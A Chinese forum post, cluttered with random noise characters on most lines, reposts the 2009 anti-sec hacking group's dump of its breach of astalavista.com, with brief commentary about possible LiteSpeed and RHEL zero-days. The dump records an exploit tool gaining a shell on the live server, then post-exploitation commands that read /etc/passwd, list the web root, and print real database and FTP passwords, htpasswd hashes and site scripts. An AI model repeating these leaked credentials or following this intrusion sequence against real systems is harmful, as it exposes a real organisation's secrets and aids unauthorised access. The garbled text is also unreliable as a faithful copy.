里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。! H4 U1 S2 ]' q
3 M% @7 G9 m- T8 r& k4 F& t
[root@front3 ~]# curl -I litespeedtech.com
' ?5 B1 A: w9 I3 w& L4 [HTTP/1.1 200 OK
$ w$ r% b, B6 S2 ?& `* ZDate: Fri, 05 Jun 2009 22:54:51 GMT
) L9 `2 m v M0 KServer: LiteSpeed' x# h, L x3 v( Z/ [
: I# w" g' u2 y" h8 n/ P另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-. s u- C9 U, e6 e% J* H
, W, C+ o$ q I. e4 A8 u, c! l7 c有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。2 |' Z2 k: n" r
0 ^# [% \* |7 J# H% P& G( B- a
, p; M0 |; x8 C+ [- Q7 O2 o/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
: I) i/ H1 Z( q7 ^$ V. ^' U/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \5 U$ J9 B2 f8 ]" U
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
5 @. ]7 z# ^5 T, S4 {3 U1 N\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
5 r4 g+ W% N+ ~3 P& |! ?: f. Z \/ \/ \/ \/ \/ \/ \/
3 c. o' y& \0 J( q The Hacking & Security Community! W7 _# f8 E( l- Y
[+] Founded in 1997 by a hacker computer enthusiast
& t; q$ @, A; J" e[-] Exposed in 2009 by anti-sec group
" n8 K# ~9 T" g( ^& B( n' r7 p. c6 y: o
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
) K( I1 d3 F# ~3 K5 m3 H# M>> 03. Who’s behind the site?
" W8 V" ?5 H" U3 r( Y% c' t7 W>>: e( {* a, A2 b" U q- u
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
~& h8 l8 `3 U* o$ X" G O1 C$ \ X3 g& n
>> 05. Is it true that the site is visited by script-kiddies and warez fans only? K+ G: N/ x) m c
>>5 R0 [0 i9 i: W: z
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and& L3 e0 t0 s! o) d. W
military institutions.2 V# e; I( L1 v4 O: i& H
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.3 n! {' }/ w' k' u$ M. `/ O7 e
, Z' K- n: n4 B. r: G/ EWhy has Astalavista been targeted?
5 ~$ d1 Q4 \! Y: o' n: U* Y, x7 P" @. p( T3 F( h& m) H& R
Other than the fact that they are not doing any of this for the “community” but
. a- o( v! X$ u& c' c. ?# Yfor the money, they spread exploits for kids, claim to be a security community$ m: z9 t/ Y; K, v7 k o
(with no real sense of security on their own servers), and they charge you $6.66
" D1 l) i9 c7 B+ `per months to access a dead forum with a directory filled with public releases
' ` p6 `9 ?$ q8 S& N$ P5 @and outdated / broken services.
3 r2 F! z) w; I! z' n% U, f; S2 Q7 d/ M7 y# f! f1 ? u- V. |
We wanted to see how good that “team of security and IT professionals” really is.: S3 S5 |* q4 V
2 Y: U' B' r; I7 nLet’s begin.3 k0 ]& f. I2 _* A1 |
% u( }/ A5 C/ \( ~( R
anti-sec:~# ./g0tshell astalavista.com -p 80
: T# k, ]2 H0 `0 h[+] Connecting to astalavista.com:80- t7 e) Z! W" ^0 y1 i9 ~6 @: @
[+] Grabbing banner…
) P! T% u" I5 b5 l% E- l9 PLiteSpeed3 k% h; @+ Z7 X
[+] Injecting shellcode…
. K. `; r" S' m' [6 E4 J8 v5 |[-] Wait for it; e" |. b, f! F& f: u' v
! h+ \: U: v* v& z' ?1 q[~] We g0tshell
$ J2 m+ v E6 G) }1 quname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
* ?! _/ f& ]) }- }) bID: uid=100(apache) gid=500(apache) groups=500(apache)1 E" V6 x% _; n# d3 b3 s
& V2 r# N, {* {! S# G' Osh-3.2$ cat /etc/passwd
" y; T# b9 ]- D* x5 v& Lroot:x:0:0:root:/root:/bin/bash) b+ d% J: p. [. Q3 ^
bin:x:1:1:bin:/bin:/sbin/nologin( P, l: h! t* J% Z; }3 x
daemon:x:2:2:daemon:/sbin:/sbin/nologin& ?* m' q1 H( \* e" w) W
adm:x:3:4:adm:/var/adm:/sbin/nologin
. d3 H- Y, @0 {3 ^7 o$ }9 M. ^lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
9 S! }( C- l+ q) O8 L2 ^; X4 E2 zsync:x:5:0:sync:/sbin:/bin/sync6 W) a6 F' ]; \5 F
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
6 O# Y; b$ P% c* H% j* C$ j% Lhalt:x:7:0:halt:/sbin:/sbin/halt
6 i6 ?# i, V* Smail:x:8:12:mail:/var/spool/mail:/sbin/nologin
/ o1 H6 y/ m% n& v8 f- R5 R jnews:x:9:13:news:/etc/news:
7 f$ e1 V* O1 I' r. E* Buucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
5 ^9 k% z/ M! k2 T4 H7 qoperator:x:11:0 perator:/root:/sbin/nologin
' x6 g+ O5 ]6 t. I1 [2 q) vgames:x:12:100:games:/usr/games:/sbin/nologin+ w9 \$ a S/ w& _
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin9 t' C1 n. B7 p5 w
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
+ N5 K+ l, h2 G# Hnobody:x:99:99:Nobody:/:/sbin/nologin+ ]4 [3 D# U- N! \
rpm:x:37:37::/var/lib/rpm:/sbin/nologin1 i% F- { Q, m0 ~7 c
dbus:x:81:81:System message bus:/:/sbin/nologin) Q( P% g3 e3 R
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
2 g- x4 q7 D5 x9 _1 d s$ _mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
/ M* o' |, M' b! D' S4 W$ v* h* K6 ysmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin: ^8 q- V8 q0 e3 }; j$ A; k9 X! F
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
) \! t1 O8 P ?2 |$ z" o6 {haldaemon:x:68:68:HAL daemon:/:/sbin/nologin- x% `/ g5 r: ?$ ~9 W# W
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin3 h+ K& R; V; ^$ r# ]
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin/ D& i- x$ b$ @* W7 C
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin0 V! i8 |& L ^# W/ y" y' t
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
7 J5 ^6 t1 |7 V( Ppcap:x:77:77::/var/arpwatch:/sbin/nologin
/ ]2 d4 `9 O8 W) l/ p1 Z5 anamed:x:25:25:Named:/var/named:/sbin/nologin8 {! ^5 f1 m, K6 u4 @2 L3 R4 z
apache:x:100:500::/var/www:/bin/false
4 b _/ e4 K- r2 b4 i3 Gdiradmin:x:101:101::/usr/local/directadmin:/bin/bash: Y7 b7 T$ D- X' p# }
mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
. W* ]& G& P6 K$ s( rwebapps:x:500:501::/var/www/html:/bin/bash r; J: Y# K; Z+ F& R# [
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
9 ^- W5 Y( W( b- z- h/ Wadmin:x:501:502::/home/admin:/bin/bash
0 K, R) w' d$ ^# Q) j: Y# f6 n; Djon:x:502:503::/home/jon:/bin/bash4 t( O2 `! `6 d* U* t
com:x:503:504::/home/com:/bin/bash
; H8 g ]/ w u; v" {. h; z& }ntp:x:38:38::/etc/ntp:/sbin/nologin
; l# G3 M; d0 }( m0 vais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin; O+ d8 p$ e; g" a1 u! ~$ u$ y+ N3 w
astanet:x:504:505::/home/astanet:/bin/bash
/ N+ n }1 ?3 [# k& Q6 Q2 f5 Mavahi:x:70:70:Avahi daemon:/:/sbin/nologin3 x: l1 r) p0 Y) l$ G. |6 b
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin# t$ [# g; ?7 v
) z7 y6 C0 t+ j. G+ E; g D+ d5 A
sh-3.2$ cat /etc/hosts
$ L( \/ i, L, i5 X; \7 `- i# Do not remove the following line, or various programs
3 a- P" x" ~: n- R4 o7 G; f8 P; \# that require network functionality will fail.5 o5 x, n& u3 }; e1 \0 b
127.0.0.1 localhost.localdomain localhost. ]& ]9 @0 {/ `6 {) K
::1 localhost6.localdomain6 localhost65 m6 {3 w6 H3 f6 f$ }. i3 F) |
80.74.154.172 asta1.astalavistaserver.com" {; V( C' |1 L) d' @& b, P% B3 M
. E9 t) C) x) a# }# `& Wsh-3.2$ pwd
$ N j; n- W0 o+ W- ~6 V: l" A/home/com/public_html
+ U. _% s% H8 C4 W! ]
8 _2 I* [3 X9 l9 T' `# V) s- _) ?# Nsh-3.2$ ls -la
0 n: _/ N+ P. @total 184609 Q( e# q/ f. X6 l! H! I1 G
drwxr-xr-x 30 com apache 4096 May 28 17:06 .9 Q8 ?! n; ?, P! _" _7 k
drwx–x–x 11 com com 4096 Jun 25 2008 ..
0 k" s, J9 C0 O6 i: Tdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin$ ?1 C- K; f, |% u1 J8 l; v8 X
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache& C+ d( `4 I; ~2 Z
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
" h, v" U$ @$ @drwxrwxrwx 2 com com 4096 May 19 00:50 config3 G7 U* X( H V, f% a
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
& Q1 Y8 a, }' \" W& y# R- g$ c/ Ddrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
& i# d$ U8 t7 {. Y5 H* Fdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing* a9 O+ t8 V% F5 |; }" w* g7 z3 e7 p& s
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo0 o# Y. [0 k# o% t! R
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__5 M- l, D: x- t( |# n* Z' W$ J$ J
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php% ? y6 X$ i F) f. t7 u: @
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd S% z0 n3 w! j" ^. u/ s/ Z- l3 i
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor# ~6 Q7 {3 K: r5 I' B0 q; U' [! X
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico, v) L9 o% J# F4 h
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
- Q/ ^+ S+ g, M: i: q: F2 x-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
`: G" T6 P$ }) ^6 J-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak( ~/ @! D$ ~7 N+ g0 f" n
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak( d; C0 Y2 z2 b" A
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool% j+ ]& _ ], O; Q" U5 q% u
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images4 G5 y1 S# }$ B G
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php9 h: l. o9 B$ T/ A
drwxr-xr-x 6 com com 4096 Feb 2 19:29 installer6 |5 f4 O* J. q
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
5 `$ U: p9 }- Z% \drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
" _' C' d1 o0 {& L$ x- i7 _& cdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media# t+ S& T; v* r9 e/ L. u2 b
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications1 C. p, g4 ?9 A9 L* E
drwxr-xr-x 34 com com 4096 May 28 16:30 modules
6 Q0 J# r+ c7 N8 Ydrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin, [0 ], |. Y; P0 Y0 R8 R
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
6 P- v7 A/ X7 A9 ndrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old! D/ Z) @4 h$ U$ A7 E$ n9 w
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy2 X; N E: c. J' m1 \
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
! k# Q: a. M& n: S-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt7 M5 u& ^0 _( d! B# }" b1 c
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml6 }. o- p9 C4 S' d
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
, J6 E) u: E: Kdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes- V8 [2 T: D& B" s" Y: i
drwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp$ |7 p1 y% p7 ~$ s2 w3 `
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam' e% O7 }( E, r2 B+ U5 j
8 S. E, J1 m7 X F6 i8 j5 D! S+ qsh-3.2$ head -20 index.php0 M! C6 f! y4 B' j7 P' i
<?php. f, }- {. Q1 p5 c9 v; ]# r! X1 g7 L0 a+ [
/ h+ q5 }. J" X/**
) v* I" ~; K1 R; D- X* The main page for the CMS
" S" c3 O% _: }& ]7 q* @copyright CONTREXX CMS - COMVATION AG' s4 l2 d S7 ]+ O. J: ?
* @author Comvation Development Team. b: f) C7 J+ V3 D7 P
* @version v1.0.9.10.1 stable) t: N. l2 j9 C
* @package contrexx1 Q' C: g; x$ b0 r
* @subpackage core
7 ]/ u: c. ]1 C( _* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage+ O1 D9 j8 Z9 V$ N7 H8 g k
* @since v0.0.0.0) r2 f( l( W+ f* g
* @todo Capitalize all class names in project9 ~2 T6 l; y& s) {1 G9 h
* @uses /config/configuration.php; ^1 L3 T6 m' {9 k+ P
* @uses /config/settings.php
t, G1 @( D3 R+ @, u* @uses /config/version.php, h* p$ U( R" T4 s8 I
* @uses /core/API.php
% T4 N' e4 n Z+ O: ^* @uses /core_modules/cache/index.class.php
0 N2 r5 h" w9 a) y, j- g$ I+ _5 }$ b* @uses /core/error.class.php
: s, o6 r5 c6 i0 q7 _9 k6 I* @uses /core_modules/banner/index.class.php. H; c1 Z" x. m% E3 k
* @uses /core_modules/contact/index.class.php
) t1 F4 U, l. Q/ N0 _* i# o8 f( D2 T
sh-3.2$ cd config/
: Q$ u3 f/ J+ I3 g, T0 ] i- Psh-3.2$ ls -la
9 B Q' {/ v3 `; w- p; |total 32
# L4 k$ m, V% Z' `drwxrwxrwx 2 com com 4096 May 19 00:50 .
( y9 Z- X( D; [drwxr-xr-x 30 com apache 4096 May 28 17:06 ..9 s$ P9 j1 S5 ?1 ]; l
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php* p' `( s6 R+ K5 x
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
* s7 }# L2 x* W3 ~$ U* Y! j3 u-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php3 l3 r) |( j% M8 i0 ~* Y0 E
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
( q! R, O0 @8 G0 Y1 U" ^9 i+ z/ X7 N2 C; d% O% `
sh-3.2$ cat configuration.php' O8 ]5 l5 o! h9 c
[snip]
: ~) l2 v& V* S4 x* \: Y$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost( n5 U$ A! w- F$ a. v
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name) [0 C. g; z" L* Q- G# O. {& [5 J
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix' _$ J2 d5 \/ s) C# B7 d) \
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
4 `- H. V! {6 n, @0 I) E9 f$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password2 g: W9 Z. e* N( m7 [. R5 @3 U: p
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)# z2 _) @* a* n3 F
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)! [( P8 g& l" `8 q6 a z
[snip]
8 \: t$ `0 {. M% s4 G$_FTPCONFIG['is_activated'] = true; // Ftp support true or false( ?& u* p) |, m) x8 ~3 Q
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode% v5 s0 X3 v, k+ Z4 l2 x' v$ I3 c
$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
/ T0 V& w2 `! S% k2 o$_FTPCONFIG['port'] = 21; // Ftp remote port
4 n _" a5 l/ t `1 ?4 _- ~$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username
6 @8 h* d7 z& y2 V& @: \: w/ }3 U$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password/ {. l [4 L: t3 D+ c+ W' q
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms- J$ d+ g W& h+ D" q
0 R- ?7 v) B. C# i2 G; ]sh-3.2$ cd ..
$ i8 I C& ^6 R1 R- K$ W3 @5 ]sh-3.2$ cd dvd/$ w$ t, O0 X/ h, H6 M
sh-3.2$ ls -la
( i6 O9 j/ g3 p; p) Htotal 2913780, Z- ]. h! Y6 K4 F9 d
drwxr-xr-x 2 com com 4096 Sep 9 2008 .' U) S: x; c) @: b
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
% V* D8 O* Z: q3 ~& `-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar4 g9 w: J1 g& j& c. ]2 j
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar
3 F$ O5 z% A, J( W4 ?, G: ^-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar8 O4 l' K9 c2 p Q, X( I
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess, B# Q' y9 x. L. c: r. V5 G
8 E, K% y/ m' Q/ a; \2 k+ @sh-3.2$ cat .htaccess' l( E5 y' s, f0 g( ^& o
authType Basic. q% r. R- C2 T2 S8 `. \4 T
authName DVD: p" r6 Y$ P$ i4 L% h& x' A% A
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd: N8 J1 P% N8 Y I$ i# Z
require valid-user
( T; p5 m' s0 H/ ?8 ^/ o
; n6 v( i' H8 c: d. dsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
3 r+ P) z0 w: U4 y7 a; kDVDdownload:CRD8cuY6.MPT6
( X0 p# H) \ L0 U, _DVDdownload2:CR8a36.wluFMg; p7 Y2 n# f) I4 O `) b. U, P
# p& Z; t! k7 B/ H7 z9 O7 c) G
sh-3.2$ cat test.php6 K1 @0 L* W" ?
<?php3 |& U2 b7 [2 c. K U2 ^% O( l
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;, M! L0 ?+ e2 P! ~" v/ z
$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
) Z) B6 K1 p1 ?echo $url;6 w' q" F7 e* s% [* r6 C2 V# c
?>* Y8 c* k4 |% T- S p; ~& f
- w; c( \7 w) Z z! C; Rsh-3.2$ cd modifications/
7 A3 P+ T+ n- l2 L0 ish-3.2$ ls -la4 g0 u. g* B5 h2 C: K8 g. i
total 32
$ c5 M/ q/ }; k$ s6 Y& A; t" mdrwxr-xr-x 8 com com 4096 May 11 12:48 .0 J1 w3 }; b, O4 {* O
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
/ V) N6 i2 [( b; h* Sdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
% g; x4 E1 L/ tdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
5 h! p3 G4 r5 G; C2 tdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
+ ~5 O- P3 U, g! ldrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
& H+ A: X! E8 E& L2 r! C, ?- rdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search- X: g% y! F% Z; r) |1 M
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
( n( D7 x& B: y/ V$ c( ^- T- M6 H' ^7 t8 k
sh-3.2$ ls -R! X( U) l$ e: S2 ]( r
.:
6 _7 I5 |, M- d- u' ]9 ?$ l9 n; icom_avtng cronjobs onlinetools pjirc search _tmp5 U9 k0 D$ O1 S& f# ~4 v$ B. g
% R: j. r( f4 V* s @! h* F% ]
./com_avtng:
) [7 W+ i- a$ kavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
' [$ t8 a5 D% a6 n' J
; H" J0 p T7 J) W) m./com_avtng/scripts:
- t- q/ ` D |' t6 Bpopunder.js; ~5 r" P1 s- i) G
9 ^: D. i" H2 M+ |+ m! f
./cronjobs:
# _3 v+ m0 _. R) G3 e% X: e; Mexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
+ Y2 k6 U- z8 |' t2 t
$ E( a ]5 W1 R9 P/ V( b9 ^./cronjobs/tmp:+ \% D) E3 _! v( E3 U
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
& m! _3 e7 p1 n' Z, O
* m9 |' z5 g' H./onlinetools:7 U; T& ?& U; _
index.php
. h' l0 e- U6 N9 U% f k* u/ T3 i5 _$ e% O0 A$ t7 ] D- y
./pjirc:; w D# {# U- J" u% B
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
9 G% H. p$ P* F1 C# z' Z- r, w; AAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt9 c4 K F5 E2 v" h) M' K
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
) O( ^4 x+ x- v3 Z' X
: G# c! i2 T$ E5 R+ [" A./pjirc/img:
% b$ h: ?- Z* u, B" G7 E: Tange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif
' G1 c V$ T% y3 N: G7 p) }2 \arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif 0 @* ^# ^) d; d. o1 v
verre-eau.gif$ C6 b& P% I: ]
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 3 t* M* k7 e, w( E4 I
verre-vin.gif
5 j+ W& U, M- t/ c; }& _: j8 }ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif+ R+ Q! r2 `. J6 }7 a
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif6 |% [9 U) L b
6 c( V" w2 b1 @% q& _$ _./pjirc/snd:+ e$ b; d0 B1 `) ~* |# D
bell2.au ding.au) W) O- s; `- U1 l
+ {, z& H r# G2 D- _
./search:
4 Z* G: A. b1 [( Z# FsearchEngines.php search.php
! c( d+ s4 X% [* s# k" v1 F; s; O' p2 [" V0 @; l
./_tmp:) M7 K4 c5 j. u, s1 ~6 L
defaultPorts.php defaultPorts.txt
) j/ T" V: u" _, ?
) V# j+ x9 H$ W! V$ R& d* ~! |sh-3.2$ cd cronjobs/! Y4 {' R, |/ i( e/ A
sh-3.2$ cat exploits.php
/ r* x* B- Z+ D. t3 v7 ~[snip], K, Z4 y% q. x# T$ K
$categories = array();
/ V% U$ m4 S4 G3 X$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;" q* L) T: r" G8 V$ x) S* E9 G4 a
$expolits = file($milw0rmFile);
- n8 I. X9 A5 [: T$ m$ m8 Y7 {$comExploits = array();6 q/ V( Z5 m5 M6 `) y, O/ V
[snip]
0 X4 }9 j- d _" F// manage data
0 \7 u! D7 e# i, {) A- Bfor ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
4 j2 P X* d7 u* M! I+ e. |1 y7 T% ]
// get path and title1 ^, k* i, |/ J1 @) M% [
$expolits[$x] = trim($expolits[$x]);, O* i8 l$ G- p' n) R
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
0 C% ~$ [) f5 @, N& y S2 k $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);( d! H. q1 r- T+ m' e
* Q/ I N' H9 }1 ?5 X6 Q5 B8 D- X
// check if file exists# d% ? q q. i
if (file_exists($path)) {
$ B2 B2 u& D, P9 y8 k1 @+ I7 `
6 J; @* S9 P6 C& ?6 d5 p $text = file_get_contents($path);
" ^; e v9 Q4 p, D/ s
O: e& O+ C9 u5 p J7 J4 O // get content and date6 ~. ?& R( L+ }
//$text = htmlspecialchars($text, ENT_QUOTES);1 ~+ w; F0 y/ t! q! r2 x6 I$ S, ~5 Y
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
- Q: {8 b2 P* J {3 O+ t if ($tmptext != ”) {0 T b$ O$ e& `( \
$text = $tmptext;
: r6 O* o- O l9 V5 ]' i } else {" V, E* y: m3 ~8 d( D
$text = addslashes(htmlentities($text, ENT_QUOTES));0 Y9 Y4 }( e( S+ Q) E6 P4 @9 R8 C9 P
}) K j C2 t2 X
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
9 v5 `3 Z' z/ a) b; P# E $tmp = explode('-', $date);2 ]/ _+ ]: I8 R& x& U
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
8 W0 j- m ?0 R- [0 d& M $cat = getCategory ($path);( K5 _5 F" ?/ p/ b, d8 _
$ext = pathinfo(basename($path));
: G4 W1 g( q$ A1 F $ext = $ext['extension'];, u. a: D8 N/ Z. a, f8 ^; m' n8 U; s
$qStr = ”
W1 O V! o& a SELECT `id`, i" M/ ]0 e- d0 I: ~
FROM `contrexx_module_exploits`
|7 c( C* M/ n. ^0 h WHERE `title` = ‘” . $title . “‘* ^6 V4 k. C2 J% U
AND `date` = ‘” . $date . “‘
* X" H0 G( G! g) y/ b3 W “;% |7 | X$ Q- e: S
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;* `0 ^, P: C" P; y Q) ^
$q = $_objDB->query($qStr);
# r" P" ?7 ] U" P" m$ V" A; b0 N) B A+ v( z# U8 w0 O1 H+ j O
if ($q->numRows() == 0) {
) [3 q6 g) B+ d2 ^% K! v7 N3 Y! A( j" n" e* {+ Z1 z2 ?: |
// prepare array2 j0 ]6 f$ O) w& s ?0 j z
$comExploits[$x]['date'] = $date;4 w* K- h l& d" U: O. O$ @
$comExploits[$x]['title'] = $title;# ~4 F* C+ R3 B9 R
$comExploits[$x]['author'] = ‘milw0rm’;
2 h: G9 `! E o1 b) ?5 e! u/ S6 v* Z $comExploits[$x]['text'] = $text;5 [& M+ \ @2 [! f6 i+ M! z; E
$comExploits[$x]['source'] = $ext;5 i) L r3 |: O" J; t3 _
$comExploits[$x]['url1'] = ”;
. E, c0 p/ K# b6 O) w2 q" m $comExploits[$x]['url2'] = ”;2 m( f/ i* s% a5 b, z* I
$comExploits[$x]['catid'] = $cat;
3 Z% \7 [& ?* q) ~) `% N/ B $comExploits[$x]['lang'] = ‘2′;
8 \5 f c5 k/ c# A $comExploits[$x]['userid'] = ‘12′;& [; m/ w* B& N, z) ]! y$ \% k0 m
$comExploits[$x]['startdate'] = ‘0000-00-00′;$ x* I8 B( X! q4 C
$comExploits[$x]['enddate'] = ‘0000-00-00′;- x2 P% k6 `% _$ r# k9 U
$comExploits[$x]['status'] = ‘1′;$ u2 o/ K% Z) `5 r" N% _: V& d6 l
$comExploits[$x]['changelog'] = $date;
6 s. g3 x6 t8 I# a* U# r
( _) H9 \3 c1 W4 h, J; L d% m }- `/ ^$ d6 t5 f* l
[snip]4 O' \* ~/ G$ \! x1 o0 K
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>; V7 _( r* M7 L& l# u
<rss version=”2.0″>
3 X5 Y- I: @* ^" f <channel>
